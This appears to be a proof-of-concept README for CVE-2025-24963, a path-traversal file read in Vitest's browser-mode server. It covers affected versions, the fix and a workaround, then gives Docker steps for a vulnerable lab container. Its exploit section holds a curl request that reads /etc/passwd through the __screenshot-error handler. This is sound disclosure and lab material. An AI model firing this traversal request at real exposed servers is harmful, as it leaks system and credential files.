来源

关联漏洞

介绍

# CVE-2025-24963 - Vitest Browser Mode - Local File Read

​CVE-2025-24963 is a medium-severity vulnerability (CVSS 3.1 score: 5.9) affecting the `@vitest/browser` package, a component of the Vitest testing framework powered by Vite. This vulnerability arises from improper input validation in the `__screenshot-error` handler of the browser mode HTTP server. When the server is exposed to the network using the configuration option browser.api.host: true, an attacker can send specially crafted requests to access arbitrary files on the server's file system, potentially leading to unauthorized disclosure of sensitive information.

## Affected Versions
The vulnerability affects the following versions of `@vitest/browser`:​

- 2.0.4 to 2.1.8
- 3.0.0 to 3.0.3​

## Mitigation
This issue has been addressed in versions 2.1.9 and 3.0.4. Users are strongly advised to upgrade to these or later versions to mitigate the vulnerability.​

## Workaround
If immediate upgrading is not feasible, a temporary workaround is to avoid exposing the browser mode server to the network by not setting `browser.api.host: true` in your configuration. This will prevent external access to the vulnerable handler.

## Prepare Environment

```
git clone https://github.com/0xdeviner/CVE-2025-24963.git
cd CVE-2025-24963/vitest-vuln-demo
docker build -t vitest-cve-2025-24963 .
docker run -itd --name vitest-cve -p 63315:63315 vitest-cve-2025-24963
```

> Note: The port Vitest uses is dynamic (e.g., 63315). You may want to monitor the logs and adjust your -p flag accordingly.

## Exploit

```bash
curl "http://<IP>:63315/__screenshot-error?file=../../../../../../etc/passwd"
```

文件快照

 [4.0K]  /data/pocs/8c6cd60bff91beb9c70cd8bb2dbe75587d6daaaa
├── [1.6K]  README.md
└── [4.0K]  vitest-vuln-demo
    ├── [ 384]  Dockerfile
    ├── [ 208]  package.json
    ├── [4.0K]  src
    │   └── [  93]  example.test.js
    └── [ 350]  vitest.config.ts

2 directories, 5 files

备注